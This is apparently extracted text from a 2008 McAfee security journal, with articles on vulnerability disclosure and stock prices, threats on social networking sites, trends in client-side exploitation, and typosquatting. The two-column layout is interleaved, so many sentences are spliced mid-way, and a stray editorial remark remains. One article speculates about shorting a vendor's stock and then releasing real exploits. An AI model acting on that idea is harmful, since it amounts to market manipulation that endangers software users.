Average volume, day of Advance Notification 82848700 61532042 54484850

Average difference in volume -2.41% -1.56% -18.77%

Average difference in volume relative to non-events -4.48% -4.17% -20.75%

Average ÎXIC volume, full year 2249267340 2089534502 1926859522 Figure 7: On average, fewer Average ÎXIC volume, full year (non-event) 2271900270 2094466552 1935854692 Microsoft shares are traded on Patch Tuesday and Advanced Average ÎXIC volume on Advance Notification 2221380000 2224365833 1872442500 Notification days.

I am not sure I highlighted the correct information on this chart.

26 McAFEE SECURITY JOURNAL However, if stock price fluctuations occur due to vulnerability and Conclusion patch announcements, what would happen if a person built up a short position in a major software company and posted a handful There is still a great deal of work to do in the area of vulnerability of vulnerabilities with exploits to the Full Disclosure mailing list? and threat implications to the equities and derivatives markets. Perhaps something like the Month-of-Browser-Bugs, but targeted We’ve primarily focused on the equities markets. The derivatives at one vendor, on one day? If this happened during market hours markets often move in the same direction but with amplified and during a day that was less likely to have competing news volatility. Given some confidence level in the direction of a move, that could distract investors (say a Tuesday or a Thursday), then it would probably make sense for traders who publish vulnerabili- the downward pressures on the stock could be significant at a ties to time that publication with options expiration dates. consumer level. It would also clearly be illegal if the vulnerabilities were not real (perhaps libel or fraud). However, if they were real, I would like to thank my colleagues Craig Schmugar and Eu- would it be illegal? Reporting the truth, albeit in a potentially ma- gene Tsyrklevich for reviewing this paper and data set, as well nipulative fashion, may or may not be considered social engineer- as for providing feedback.—A.B. ing or even illegal. Perhaps the legality could be argued either way, but consider the Firestone and Ford tire controversy.8 If you had driven a Ford car at the time, had tire problems, and shorted the stock, would that have been legal? Certainly. If you had shorted the stock, and Anthony Bettini is a member of the McAfee then told Firestone, Ford, or others, would that have been legal? Avert Labs senior management team. He specializes in Windows security and vulnerability As with any attack vector or vulnerability, awareness and disclo- detection. Bettini has spoken at the National sure often improve the security posture of those who can resolve Institute of Standards and Technology’s National the problem. By openly talking about weaknesses, perhaps we Information Systems Security Conference in the Washington, D.C. area on anti-tracing techniques can improve and appropriately monitor the system. It is possible as well as for numerous Global 2000 companies. people are already using zero-day threats for financial gain, not While at Foundstone, he published new vulner- simply for embedding them within password-stealing Trojans but abilities found in Microsoft Windows, ISS Scanner, for taking short or options positions in equities and derivatives. PGP, Symantec ESM, and other popular applications. Bettini was the technical editor for Hacking It’s clear that spammers have figured out ways to profit from Exposed, 5th edition (McGraw-Hill). securities markets: we have received lots of penny-stock spam.

endnotes additional references 1 Goldsmith, Dave, and Jeremy Rauch; Matasano Security. “Hacking Capitalism,” • “CBOE’s archive of historic VIX data, using newer algorithm for the pre- Black Hat USA 2007. August 2, 2007. September 22, 2003 algorithm switch.” April 20, 2008. http://www.cboe.com/ 2 “Financial Information eXchange,” Wikipedia. April 20, 2008. micro/vix/historical.aspx http://en.wikipedia.org/wiki/Financial_Information_eXchange • lo, Andrew W. “The Adaptive Markets Hypothesis: Market Efficiency from 3 “Random walk hypothesis,” Wikipedia. May 15, 2008. http://en.wikipedia.org/ an Evolutionary Perspective.” Journal of Portfolio Management. wiki/Random_walk_hypothesis • Financial metrics are primarily courtesy of Yahoo Finance. May 15, 2008. 4 “Efficient Market Hypothesis,” Wikipedia. May 15, 2008. http://en.wikipedia. http://finance.yahoo.com org/wiki/Efficient_market_hypothesis • additional financial metrics are courtesy of Google Finance. April 20, 2008. 5 “Past performance not indicative of future results,” CBOE. May 22, 2008. http://finance.google.com http://www.cboe.com/micro/vix/faq.aspx 6 “Martingale (probability theory),” Wikipedia. May 22, 2008. http://en.wikipedia. org/wiki/Martingale_%28probability_theory%29 7 “Emulex Hoax,” Wikipedia. April 20, 2008. http://en.wikipedia.org/wiki/ Emulex_hoax 8 “Firestone and Ford tire controversy,” Wikipedia. April 20, 2008. http://en.wikipedia.org/wiki/Firestone_and_Ford_tire_controversy

FALL 2008 27 The Future of Social Networking Sites

By Craig Schmugar

In recent years social networking sites—MySpace, Facebook, and others—have become household terms. Many people think of social networking on the Internet as a relatively new phenomenon when, in fact, sites such as Classmates.com and SixDegrees. grew more massive and the content evolved (including the addi- com have been around for more than a decade. Still, the growth tion of games), the back end failed to keep up with the growth. explosion has occurred only during the past few years. So what Site administrators were forced to restrict high-bandwidth con- exactly makes a site a “social networking” venue? At the core, tent, but even still performance was unsatisfactory and the user social networking sites are those that comprise an online com- base jumped ship. Furthermore, Friendster attempted to fit the munity which allows users to share information, discover new user base into their predetermined model of how the network contacts, and reconnect with old ones. should be used and by whom. Social networking sites are significant for two main reasons. First, MySpace provided a more robust platform, not only because they are the epitome of Web 2.0, in which the network of users is of its greater bandwidth, but also in the level of freedom users the platform and the community drives the content. The platform enjoyed to create, modify, and view a wider variety of content. grows through user contributions, enabled by applications pro- Once the word got out that MySpace was the new Friendster, vided for community use. Second, social networking sites combine it didn’t take long for a majority of users to make the switch. elements of communication channels—such as email, message A few takeaways from this early battle in social networking are boards, instant messaging, and chat—with media vehicles—such that the platform needs to be flexible, it needs to expand and as audio, video, and print. In these communities, like-minded indi- evolve, and user retention is key. These principles are paving the viduals can share information and interests and provide feedback way for the future of social networking sites. and reviews. Such sites can act as collaborative platforms, allowing entire networks to grow in value as the user base increases. Fur- thermore, these platforms allow for the most direct and targeted Social Insecurity media outlets ever seen; businesses can focus their marketing efforts on those who are truly interested. Social networking sites MySpace was able to overtake Friendster in part by allowing contain a warehouse of information that can be mined and ana- users to highly customize their profiles. But this opened the door lyzed to expand user profiles and to build complex diagrams and for attackers to insert malicious code as well as launch convincing maps of user-to-user and user-to-interest relationships. phishing attacks directly from their MySpace profiles. Key to the success of any social networking site is a strong and Unfortunately such user flexibility lends itself to exploitable loyal user base. Friendster.com knows this all too well. conditions, which the bad guys use and abuse. In a race for market share and in an effort to avoid being the next Friendster, Friendster was the precursor to MySpace and by far the number- security has taken a back seat for many social networking sites. one social networking site during its prime. What happened to Consequently, social networking sites have been hosts to worms, it? Friendster was a sort of success catastrophe. As the user base phishing attacks, vulnerabilities, data harvesting and leakage, rogue ad distribution, defamation, and last, but not least, spam.

28 McAFEE SECURITY JOURNAL Where Are We Now?

Two and a half years after Samy, the first widespread social Each time you click a link, rate a blog, or networking worm released on October 4, 2005, hit the scene, chat on a specific subject, the site can most old security vulnerabilities had been patched. But the problem has not gone away. Until security flaws result in fewer gain intelligence about you to enhance subscribers, vulnerabilities will be common, and cross-site script- your social network. ing vulnerabilities, such as that exploited by Samy, are one of the most widely reported types of vulnerabilities in the Common Vulnerabilities and Exposures database.1 And the situation is likely to get worse before it gets better. Approximately nine months after Facebook launched its platform, In May 2007, Facebook launched the Facebook platform, which MySpace followed suit, and recently Google released an applica- allowed third-party developers to author and market applications tion program interface (API) for orkut, Google’s social networking to Facebook’s 20 million active users. One year and 50 million site. Although these platforms have set the stage for the next additional users later, more than 20,000 Facebook applications generation of social networking sites, they have also created have been developed, with 95 percent of the user base having another vector for attackers to exploit. run at least one application.2 These applications pose additional risks—as users may have a false sense of security because of the applications’ association with a site they trust, Facebook.com. Yet What Lies Ahead? the vast majority of these applications are released by developers without prior review by the site. Future social networking sites will become more important In January 2008, Facebook banned the application Secret Crush because platforms will expand further. “Killer apps” will include after it was reported to have led users to install Zango adware.3 mobility, presence, and location awareness, with the goal of (See Figure 1 for other examples of widespread threats.) The sig- making your physical life more convenient through your virtual nificance is that Facebook doesn’t review applications, and things network; you’ll have a traveling social network in your back can (and have) “slipped” by. Although this reported case was pocket. Not only will you be able to know which of the friends more of an annoyance (adware), the next could be much worse. in your network is online, but you’ll also be able to know which are nearby. Cell tower triangulation and global positioning systems will be able to pass along your location to whomever you allow. Location-aware services could match local businesses and entertainment to your interests based on your profile. Business travelers could more easily rendezvous with coworkers and clients Profiled social networking threats at conferences and trade shows. The thrill of online dating could be heightened through the creation of location-specific communities, so you wouldn’t only meet someone online, but you could THREAT TYPE SITE also chat with a prospective mate in the same room. Grey Goo worm Second Life Social sites will also be smarter, mining user information across JS/QSpace worm MySpace the web. Social bookmarking site functionality such as Digg will JS/SpaceFlash worm MySpace be married with social networks and enhanced with self-learning technology such as Pandora or StumbleUpon and tagging func- JS/SpaceTalk info stealer MySpace tionality such as Flickr. The result is a more constant and refined Kut Wormer worm orkut stream of relevant information, which actually educates and Mass leak of private photos data loss MySpace informs the community in a much more efficient manner than

PWS-Banker! 1d23 password stealer orkut occurs today.

Samy worm MySpace From your iPhone, you’ll be able to get movie recommendations from those in your network. You’ll also be able to read reviews Scrapkut worm orkut that your friends found helpful and find show times for the the- Secret Crush unwanted program FaceBook aters in your vicinity, and then you’ll be able to check the location Xanga Worm worm Xanga of your friends to determine how quickly they can meet you.

Figure 1: Worms and other threats have plagued social networking sites. Users often trust their community sites too much.

FALL 2008 29 Sites will understand your interests based on your behavior: web The increased use of open and portable profiles, mash-ups (web sites you visit, articles you read, music you listen to, friends you applications that combine content from various sources into a chat with and what their interests are, for example. This informa- single tool), and open APIs will dramatically facilitate cross-site tion will be used to keep you current on changing events and to usage, but will also increase the complexity in defending against filter the noise that bombards users today. You’ll be left with a threats targeting these vectors. Multitiered attacks are difficult highly customized web experience that requires very little direct to pinpoint today and will be even more so tomorrow. Attacks user input. Whereas Web 1.0 was driven by site administrators may originate from one site only to be propagated through and Web 2.0 was driven by user-generated content, the future of another before appearing on an affected social network. Host- social networking lies in user and content relationships augment- based defenses will need to negotiate the relationships sites ed by user behavior to tailor content. have with one another to piece together valid and invalid site Early incarnations of next-generation sites, called Social Network- interactions and weed out the good from the bad. ing 3.0, may in fact be perceived as spooky in the level of accu- Many users will find the privacy concerns in this article—informa- racy of this “artificial intelligence.” Profiling takes on a different tion harvesting and correlation, and location tracking—to be too meaning in this realm, where the site can actually bring together great to ignore. Indeed, many people will not opt into such ser- users of similar interests. In some respects, compatibility profiling vices. However, when users see that they can benefit from provid- used by online dating services could be considered an early incar- ing a little bit of data and they have established trust relationships, nation of creating social connections through online profiling, many of them will volunteer some details. Vendors are acutely bringing compatible people together; but in Social Networking aware of this and are encouraging users to take baby steps, such 3.0 this concept is significantly expanded without the need to as allowing locations to be reported granularly only by state or complete a lengthy questionnaire. Each time you click a link, rate city, for example. Unfortunately, online predators will be lurking, a blog, or chat on a specific subject, the site can gain intelligence and security vulnerabilities can have dire consequences when such about you to enhance your social network. information falls into the hands of the bad guys. Who will benefit from this explosion of information correlation? This is an exciting time for social networking sites, which are Of course, the user base is a driving factor, but others seek to ben- rapidly expanding, adding functionality, and growing their user efit from this arrangement. Advertisers are drooling at the notion bases. These sites have multibillion-dollar valuations. Big changes of higher conversion rates when marketing happens at the users’ lie ahead that are both compelling and threatening; in many level based on their specific interests. More users will actually pay ways the future of social networking sites defines the future of attention to the ads and take an interest in their content. the Internet itself.

Risks Increase

As user benefits increase, so will opportunities for attackers. Threat Researcher Craig Schmugar has been Spammers and scammers will look to exploit this treasure trove researching and combating threats for McAfee of information and will more easily construct convincing social Avert Labs since 2000. Since then he has discovered engineering attacks with all this data. Users will be taken off and classified thousands of new threats, including guard by the level of detail and personalization in attack mes- the Blaster, Mydoom, Mywife, and Sasser worms. He admits that during this time he is starting to feel sages. Social botnets will also have the potential to seriously more anti-social. disrupt the ecosystem, poisoning the network with solicitations and false testimonials. Site administrators will have their work cut out for them to keep the content quality high, while block- ing the bad guys and still allowing everyone else to use the site as it is intended. Securing future social networks will depend more heavily on server-side defenses. Back-end systems will need to scan large amounts of incoming and outgoing data, searching for evidence of mischief or malicious code. Site and content reputation services may help balance usability and security. The trust relation- ship between sites and users is key to the success of tomorrow’s networks. Violation of that trust could lead to the failure of an endnotes entire community. 1 http://cwe.mitre.org/documents/vuln-trends/index.html 2 http://www.facebook.com/press/info.php?statistics 3 http://www.zdnet.com.au/news/security/soa/Spyware-claims-kill-off-Facebook- s-Secret-Crush/0,130061744,339284896,00.htm?omnRef=http://www.google. com/search?num=100

30 McAFEE SECURITY JOURNAL The Changing Face of Vulnerabilities

By Rahul Kashyap

Although social engineering does not play a role in all forms of security threats, McAfee Avert Labs has observed a growing trend recently: malware writers using social engineering to exploit software vulnerabilities.

Most of the infamous Internet worms in the first half of this propagation that plagued Windows at that time. The effects decade typically exploited one or more vulnerabilities in Microsoft of XP’s SP2 became much more visible a couple of years later, applications. The notorious Sasser, Blaster, Code Red, and SQL as many users migrated to the updated operating system. Slammer had a common factor. (By the way, Avert Labs discov- However, malware writers were not to be outdone. They quickly ered Sasser and Blaster, as well as other significant malware.) shifted their focus from server to clients, uncovering vulner- They all exploited server vulnerabilities. The intent of these worms abilities in Microsoft Office, Microsoft Internet Explorer, and was to destroy servers via quick self-propagation after exploiting various proprietary file formats. The client assault gave birth to the flaws. Although products from many vendors have suffered a host of fuzzers4 (which search for security holes by throwing from similar security holes, we will primarily focus on vulner- random data at an application), scripting-language parsing bugs, abilities and trends in Microsoft products in this article. We’re not and ActiveX control–related vulnerabilities. Projects such as the singling out Microsoft as being particularly vulnerable, but rather “Month of Browser Bugs”5 (and others), axfuzz,6 COMRaider, acknowledging that the popularity of Microsoft products among and hamachi7 increased interest in this area and helped expose consumers and businesses attracts malware writers and data the innumerable issues plaguing client software. Bug discovery thieves like no other target. and the exploitation of client applications has been at its peak Avert Labs has seen that server vulnerabilities that can be exploited by worms have diminished in the past few years thanks Microsoft remote vulnerability patches to increased use of security measures that protect remote proce- 14 dure calls. To illustrate, Figure 1 lists all the remotely exploitable vulnerabilities via Microsoft Windows remote procedure calls dur- 12 ing a 10-year period through the first quarter of 2008. The trend 10 has fallen dramatically in the last two years. We see a similar 8 trend if we sample remotely exploitable vulnerabilities for other 6 popular Microsoft server platforms, such IIS Web Server, SQL Server, and others. 4 Microsoft further increased its defenses with the release of Ser- 2 vice Pack 2 for Windows XP. Along with other protection mecha- 0 nisms, SP2 included data execution prevention,2 which—though 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 not foolproof3—definitely helped in curbing the network worm Figure 1: Microsoft has significantly tightened the security of its remote procedure calls since 2006. (Source: Microsoft1).

FALL 2008 31 Office vulnerability patches 45 Targeted Attacks

40 The key to client vulnerabilities is that they need user interaction 35 to be exploited. Hence malware authors have had to come up 30 with more innovative ideas to lure users into clicking links and downloading images and documents from the Internet. One of 25 the main thrusts for exploiting client systems has been a rapid 20 growth in spam that relies on social engineering. 15 Social engineering and the focus on client vulnerabilities go hand 10 in hand. The connection between these two factors is obvious,

5 and the threat has recently become more complex.

0 Part of that complexity lies in targeted social engineering attacks, 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 which are the emerging trend in the threat landscape. Targeted attacks are especially popular in defense and military establish- Figure 2: Microsoft Office vulnerabilities increased in 2006 and have remained high in ments.12 Ever since the rash of Office vulnerabilities in 2006, mul- the two successive years. (Source: Microsoft). tiple reports have appeared about government agencies receiving emails with malicious Word, PowerPoint, or Access files. It looks like the combination of social engineering and vulnerabilities has during this period; this trend continues even as we prepare this found another target: espionage. journal. The numbers of client software being exploited is hard Spying, of course, is stealthier and much more difficult to uncover to determine, but some sources claim the figure to be in the than a merely profit-driven attack. On multiple occasions, the vul- hundreds of millions.8 nerabilities discovered in these malicious embedded documents Figure 2 offers a vivid picture on the sudden spike of vulnerabili- have been zero-day attacks, which make these document files ties for Microsoft Office. These peaked in 2006 and continue to even more difficult to detect: these vulnerabilities are often found keep Microsoft busy. only after the damage is done. Because these zero-day vulnerabilities have targeted specific government or military installations, The majority of these vulnerabilities have affected Office 2000. it’s possible that these attacks could be sponsored by foreign This version is widely used, thus it has been more widely exploited. agents or governments. Custom-designed social engineering, In the economics of malware writers, vulnerabilities in Office 2000 zero-day vulnerabilities, money, and power sound like elements offer a better return on investment. This is primarily because this of a John le Carré novel. Some security analysts think this is not suite has long had a major security disability: Office 2000 users fiction. Many theorists have predicted that the next generation 9 must visit Microsoft’s “Office update” page to download patches , of warfare will be in cyberspace. Perhaps all of these events are and the automatic online updates do not serve Office 2000 or just test cases for a cyberwar? Office 97. This oversight creates a terrific opportunity for malware writers to exploit the fact that many users are unlikely to regularly update their Office suites.10 The number of “zombie” machines Stealthy Web Hacks taken over because of this type of security hole could be in the tens of thousands. Other exploits that have changed in recent years are web server hacking and hijacking. Earlier attackers used to deface web sites Although we’re focusing on vulnerabilities in Microsoft products after they hacked them—usually leaving a note on the site in the in this article, the trend affects other popular client software hope of becoming famous. That’s no longer the case, at least not vendors, such as Adobe, Mozilla, Apple, and more. The ”Month with today’s new generation of sophisticated hackers. With the of Apple Bugs” highlighted many client problems, and there plethora of client vulnerabilities, hackers have started exploiting has been a big spike in the vulnerabilities found in widely used these in a coordinated manner, spreading malware by first compro- software, such as Apple QuickTime, Adobe Flash Player, and mising popular web sites, stealthily planting malware, and luring Adobe Reader, to name just a few. The recent exploitation of the users via social engineering tricks. PDF mailto: vulnerability (CVE-2007-5020)11 and of Flash using ActionScript (CVE-2007-0071) were among some of the critical As a leading example, the Super Bowl (American football final) flaws that affected thousands of users. hack in February 2007 deserves mention, as it involved the insertion of a malicious JavaScript into the home page of the

32 McAFEE SECURITY JOURNAL official site.13 The script exploited two flaws in Internet Explorer This could be the perfect time for these techniques to leverage and infected unpatched users with a Trojan that connected to a social engineering tricks as one of the attack vectors for several Chinese server, giving full access to the compromised machine. reasons: Similar stealthy hacks have been reported for many popular web • Currently there aren’t any publicly known reliable, sites, including embassies, newsgroups, and corporations. automated ways to exploit these new techniques (mainly Another emerging threat that made millions of homes vulner- for mass propagation) able was exploiting home routers via Universal Plug and Play, • They can be easily tested on targeted individuals or groups which allowed a malicious Flash file embedded in a web page to via social engineering as a part of the development process reconfigure the victim’s router.14 (The fact that the vast majority of Internet users use the default passwords in their home routers • The return on investment for these techniques is higher helps make this attack possible.) In this situation the victim could using social engineering than in putting the effort into further be lured by any seemingly innocuous link to pay bills online or research to achieve mass propagation read more about some topic. Most likely the user would have no clue that the router had been compromised, with all traffic— including sensitive passwords—being sent to someone else. Conclusion With the recent trends in vulnerabilities, social engineering is a New Vectors of Exploitation force that is difficult to combat. No matter how many protection mechanisms vendors implement in their software and operating The early half of this decade saw extensive exploitation of stack, systems, effective social engineering can subvert them all as long heap, and integer overflows, format-string vulnerabilities, and as users continue to click on any link that they come across. We other weaknesses, most of which were relatively easy to exploit can’t expect cyber laws to thwart social engineering any time from a technical viewpoint. Now, however, most of these simple soon (except for filing charges for fraud), but increased education stack overflows are no longer a big threat in widely used soft- can definitely help minimize losses and the impact on unsuspect- ware, such as Windows, because of superior software developing victims. ment and quality assurance testing. In addition, technologies like In the meantime, think twice when you’re asked to click to address space layout randomization have challenged hackers to “accept” that prize you’ve just won! go beyond traditional exploitation mechanisms. Attacking vulnerabilities has entered a new phase, where exploiting concepts such as null pointers15 and race conditions16—as well as developing reliable exploitation techniques like heap spray17—are gaining popularity. Many of these bugs have been Rahul Kashyap is the Manager, Vulnerability around for a long time and had been thought unexploitable. Research and IPS Security for McAfee Avert Labs. He is responsible for vulnerability research, zero-day analysis, intrusion prevention system content, and emergency response. Kashyap is a big Dilbert fan and hopes to start his own geeky security-focused comic strip some day.

endnotes 1 http://www.microsoft.com/technet/security/current.aspx 9 “Keep your operating system updated: Frequently asked questions.” http:// 2 “How to Configure Memory Protection in Windows XP SP2.” www.microsoft.com/protect/computer/updates/faq.mspx http://www.microsoft.com/technet/security/prodtech/windowsxp/depcnfxp.mspx 10 ”MS Office Flaws Ideal Tools for Targeted Attacks.” http://blog.washingtonpost. 3 “Analysis of GS protections in Microsoft Windows Vista.” com/securityfix/2006/04/ms_office_flaws_ideal_tools_fo_1.html 11 http://www.gnucitizen.org/blog/0day-pdf-pwns-windows/ http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf 12 “The New E-spionage Threat.” http://www.businessweek.com/print/magazine/ 4 ”Browser Fuzzing for fun and profit.” http://blog.metasploit.com/2006/03/ content/08_16/b4080032218430.htm browser-fuzzing-for-fun-and-profit.html 13 “Dolphins’ Web sites hacked in advance of Super Bowl.” http://www.network- 5 “Month of Browser Bugs,” http://blog.metasploit.com/2006/07/month-of- world.com/news/2007/020207-dolphins-web-sites-hacked-in.html browser-bugs.html 14 “Hacking the interwebs,” January 12, 2008. http://www.gnucitizen.org/blog/ 6 “AXFUZZ: An ActiveX/COM enumerator and fuzzer.” http://sourceforge.net/ hacking-the-interwebs/ projects/axfuzz/ 15 ”Application-Specific Attacks: Leveraging the ActionScript Virtual Machine.” 7 “Hamachi,” by H D Moore and Aviv Raff. http://metasploit.com/users/hdm/tools/ http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf hamachi/hamachi.html 16 “Unusual Bugs,” Ilja van Sprundel. http://www.ruxcon.org.au/files/2006/un- 8 “637 million Users Vulnerable to Attack,” Frequency X. http://blogs.iss.net/ usual_bugs.pdf archive/TheWebBrowserThreat.html 17 “Heap Feng Shui in JavaScript.” http://www.determina.com/security.research/ presentations/bh-eu07/bh-eu07-sotirov-paper.html

FALL 2008 33

Unintended Adventures In Browsing

By Benjamin Edelman

Browse the web, and you may be exposed to a variety of attacks that are well chronicled in the McAfee Security Journal.

From malicious banners to adware bundlers, the sites you intend so squatters also claim domains such as “www.mcafeecom. to visit may cause remarkable harm. But users should also be com.” Still other squatters focus on adding “http” prefixes, or aware of the sites they do not intend to visit—the sites they registering the corresponding .com’s for domains that actually stumble across by accident. reside in other top-level domains. How do users end up at these typosquatting sites? Some users Basic Strategy may forget a site’s correct spelling. Others make typing errors. (Consider non-native English speakers, users with poor eyesight, For those of us who sometimes slip up when typing a URL, there’s and users still improving their typing skills.) Novice users may not a special kind of security threat to watch out for. This plague of the realize the correct punctuation of a site’s full address, and hurried imperfect typist is called typosquatting. The typosquatter strategy users may wrongly enter part of a URL. Even the most sophis- is to anticipate domain names users might accidentally “request.” ticated user can make an entry error on a mobile device with a Consider a user who misspells “bankofamerica.com” by doubling small keyboard, on a handwriting-recognition tablet, or during a the “k” and dropping the “e” to yield “bankkofamrica.com.” bumpy ride in a moving vehicle. So it would be wrong to blame Ordinarily, that user would receive a browser error message, the users who “request” typosquatting sites. On the contrary, directing the user to the real Bank of America site. But suppose although users certainly end up at these sites, they generally get a typosquatter had anticipated the user’s error. The typosquatter there by mistake. might register the misspelled domain (and several other inaccurate names) in hopes that users will eventually wander in. The Scope of Typosquatting Historically, typosquatters primarily focused on spelling errors— inserting a stray letter, dropping a letter, or transposing two With many users making a wide variety of errors, typosquatting letters. But recently typosquatters have found other tricky ways has become remarkably widespread. The McAfee SiteAdvisor® to attract unintended traffic. Suppose a user omits the period service runs ongoing searches for typosquatters, and in the that separates “www” from a site’s domain name, for example, McAfee Avert Labs’ May 2008 examination, we found more than “wwwmcafee.com” instead of “www.mcafee.com.” Typosquat- 80,000 domains typosquatting on just the top 2,000 web sites. ters can register that domain. (As it turns out, someone did! And Go deeper into the web, and typosquatting grows even more. McAfee is working to recover it.) In the case of trailing periods, typosquatters rightly anticipate that web browsers will automatically append a “.com” to a domain with no top-level domain—

34 McAFEE SECURITY JOURNAL Domains frequented by kids are particularly rich targets for typo- complaints about infringing domains. To register a site in squatters. For example, a recent analysis identified 327 different a major top-level domain, a registrant must agree to the typosquatting registrations that are all close variants of “cartoon- UDRP’s jurisdiction, so the UDRP applies regardless of the network.com.” Freecreditreport.com led the list compiled with location of the typosquatting site. That said, UDRP rem- SiteAdvisor technology; also popular were YouTube, Craigslist, edies are limited to the forfeiture of an infringing domain Wikipedia, and Bank of America. (For the numbers, see Figure 1. without a payment of money damages. And for examples of creative misspellings, see Appendix.) Although the ACPA imposes significant penalties, typosquatters seem to realize that enforcement is unlikely. Legal Response So despite the threat of major sanctions, typosquatters continue to operate with abandon. In general, typosquatting is illegal in the United States. The 1999 Anti-cybersquatting Consumer Protection Act (ACPA), 15 USC §1125(d), prohibits registering, trafficking in, or using domain Typosquatters’ Profit Strategy names that are identical to, or confusingly similar to, a trademark Once a user arrives at a typosquatting site, the squatter or famous name. The ACPA grants damages of a typosquatter’s wants to make as much money as possible. ill-gotten profits (15 USC §1117(a)(1)), or statutory damages of $1,000 to $100,000 per typosquatting domain (as the court Some years ago, notorious typosquatter John Zuccarini forced considers just) (§1117(d)). his unwitting visitors to view sexually explicit web sites they did not want and had not requested. Zuccarini registered at Other countries’ laws treat typosquatting somewhat differently, least 8,000 domains, which I documented at length.1 But he but most nations view typosquatting as a genre of trademark didn’t get away with this scam forever: In September 2003, infringement—hence it is prohibited. Furthermore, the Uniform Zuccarini was arrested for violation of the Truth in Domain Dispute Resolution Policy (UDRP) establishes arbitration for Names Act, which specifically prohibits any action that “uses a misleading domain name with the intent to deceive a person into viewing obscenity.” These days, the typosquatters standard approach is advertis- NUMBER OF ing. Among the thousands of typosquatting domains I’ve DOMAIN TYPOSQUATTING DOMAINS examined in the past several years, it’s rare to find one not freecreditreport.com 742 showing ads. cartoonnetwork.com 327

youtube.com 320

craigslist.org 318

blogspot.com 276

clubpenguin.com 271 The McAfee SiteAdvisor service runs wikipedia.com 266 ongoing searches for typosquatters, and runescape.com 264 in the McAfee Avert Labs’ May 2008 miniclip.com 263 examination, we found more than 80,000 bankofamerica.com 251 domains typosquatting on just the top dailymotion.com 250 2,000 web sites. metroflog.com 249

addictinggames.com 248

friendster.com 246

myspace.com 239

verizonwireless.com 238

facebook.com 235

Figure 1: Typosquatting’s most-popular list. This table reports a selection of trademarks highly targeted by typosquatters. The data comes from the May 2008 examination of the SiteAdvisor service data set.

FALL 2008 35 Figure 2: A typosquatter regis- ters a domain name similar to a leading bank’s, and then—indi- rectly—sells advertising links to that and other banks.

When typosquatting sites show ads, they typically attempt to the typosquatter even has to pay Bank of America high statutory select ads “relevant” to the site the user was (in all likelihood) damages if the bank files a suit. But instead, the typosquatter trying to reach. So in the bankkofamrica.com example we men- ends up selling advertising space to Bank of America—which, at tioned, the resulting ads promote—predictably—banks. Which least initially, may be none the wiser. banks? First on the list is Bank of America itself. (See Figure 2.) How is this possible? Typosquatters don’t directly sell space Surprised? On the one hand, that ad placement is useful for to advertisers. (Imagine the conversation: “We’d like to show Bank of America: At least they manage to reach the customer, your ads on our typosquatting site?” “You want to put our despite the customer’s typographic error. But on the other hand, ads where?”) Instead, typosquatters sell their inventory to ad it’s remarkable for this typosquatter to ask Bank of America networks, which in turn recruit advertisers. The largest network to pay to reach a customer who already requested Bank of in this space is Google, whose AdSense for Domains product America by name. After all, the typosquatter is infringing Bank and other domain-syndication products serve ads on more than of America’s trademark, exactly in violation of the ACPA, which 80 percent of the typosquatting sites recently uncovered by says that the typosquatter can’t register such domains and that SiteAdvisor technology.

36 McAFEE SECURITY JOURNAL What’s Next for Typosquatters? typosquatters would have far less incentive to register infringing domains; no other ad network is likely to pay typosquatters as In June 2008, the Internet Corporation for Assigned Names and much as Google does. (Disclosure: I serve as co-counsel in Vulcan Numbers (ICANN) voted to speed the process of creating more Golf, et al., v. Google, et al., trademark-holder class-action litiga- top-level domains. Beyond the familiar domains most users know, tion regarding Google’s responsibility for the typosquatting sites there are already lesser-used domains such as .info, .biz, .muse- where Google pays to place ads.) um, and .travel. Soon, we can expect new domains like .nyc or .lib (as some have suggested). More top-level domains mean more opportunities for cybersquatting—for exact registration of Defenses famous trademarks, or for close typographic variations of famous Though the typosquatting battles continue, concerned users can names. When users request these domains—whether in misguid- do plenty to protect themselves. First, be careful when you type. ed attempts to reach the “real” sites, or in mistaken attempts to Be alert for typosquatting, particularly when requesting a site recall sites’ true addresses—typosquatters can jump in with their that’s hard to spell. Guessing a domain name may not be the infringing interlopers. best choice; consider using a search engine instead. But there are signs that typosquatting may soon be on the Second, after arriving at a site, look twice before you proceed. Is decline. For one, some major web sites have taken action to this really the site you intended to reach? Is this link an ordinary protect themselves and their customers from typosquatters. pointer, or a paid advertisement? Should this government site For example, in 2006, Neiman Marcus sued domain registrar really be a .com, or did you want the corresponding .gov? A bit Dotster. Neiman Marcus alleged that Dotster registered scores of critical thinking may serve you well as a defense against typo- of domains infringing Neiman Marcus marks, showing ads to squatting or other attacks. maximize its revenues from these typosquatting sites. Neiman Marcus claimed Dotster acted not just as registrar for these Appropriate software can also help protect users from typosquat- domains, but also as registrant, choosing which domains to reg- ters. SiteAdvisor technology identifies many typosquatting sites.A ister, and reaping the profits from resulting ads. The case settled typo-protection service, such as OpenDNS, provides additional pro- in 2007 on confidential terms, and Neiman Marcus has since tection. Search engines typically offer help—“Did you mean? … gone on to sue other large squatters. (Disclosure: I served as a ” spelling correction—so that users can avoid many typosquatting consultant to Neiman Marcus in some of these cases.) Verizon sites by running searches instead of typing domain names directly and Microsoft have also been vigilant in similar litigation. On one into a browser’s address bar. hand, these cases aren’t particularly prevalent. But the ACPA’s statutory damages—$1,000 and more per domain—can force typosquatters to pay big money for their large-scale infringe- ments. Microsoft alone has received more than $2 million in typosquatting settlements. Benjamin Edelman is an assistant professor at the Harvard Business School, where he studies Further, persistent rumors suggest top ad networks, particularly electronic marketplaces and online fraud. He is also Google, may abandon the typosquatting industry. Recent trade- a special advisor to McAfee for the SiteAdvisor ser- mark-holder class-action litigation has challenged Google’s role vice, offering an independent perspective to supple- ment SiteAdvisor site ratings. Though a fast and in funding the typosquatting industry, and these typosquatting accurate typist, Professor Edelman has occasionally placements have been a repeated source of advertiser and trade- embarked on unintended browsing adventures. mark-holder complaints. If Google ceased funding typosquatting,

endnotes APPENDIX 1 “Large-Scale Registration of Domains with Typographical Errors,” January 2003. Examples of Typosquatting Sites: Cartoonnetwork.com Harvard Law School. (http://cyber.law.harvard.edu/archived_content/people/ Among the more than 80,000 domains in SiteAdvisor’s May 2008 examinations we edelman/typo-domains/) found these typosquatting variations of cartoonnetwork.com:

